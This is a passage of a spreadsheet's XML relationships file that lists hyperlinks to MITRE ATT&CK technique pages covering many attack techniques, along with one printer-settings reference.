TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1463" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/004" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/008" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/002" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/005" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1433" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/005" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/005" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/005" TargetMode="External"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1470" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/005" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/002" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/004" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/003" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/007" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/003" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/001" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/001" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/001" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1512" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/01" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/003" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/004" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1404" TargetMode="External"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1582" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/002" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/001" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/002" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/003" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1612" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/003" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/001" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1533" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/005" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/004" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/002" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/012" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/002" TargetMode="External"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1417" TargetMode="External"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1618" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/003" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/002" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/003" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/001" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1197" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/001" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/007" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/001" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1610" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/007" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/001" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1403" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/004" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/008" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/001" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/01" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1517" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/004" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/001" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/005" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1412" TargetMode="External"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1604" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/002" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/006" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/006" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518/001" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1580" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/003" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/003" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1475" TargetMode="External"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1450" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/012" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1521" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/004" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/004" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/002" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/005" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/003" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/001" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1534" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/006" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/004" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/014" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/001" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1411" TargetMode="External"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings4.bin"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/002" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/004" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1489" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1529" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/003" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/001" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/001" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/003" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/012" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/009" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1409" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1400" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/003" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/006" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/01" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/002" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1482" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/001" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/002" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1176" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/007" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1510" TargetMode="External"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1468" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/004/" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/001" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/008" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/002" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/001" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1039" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1490" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/001" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1526" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/001" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/003" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/004" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1401" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1458" TargetMode="External"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1508" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/014" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/007" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614/001" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1609" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1539" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1531" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/003" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1092" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/001" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/001" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1080" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/002" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1464" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/004" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/006" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 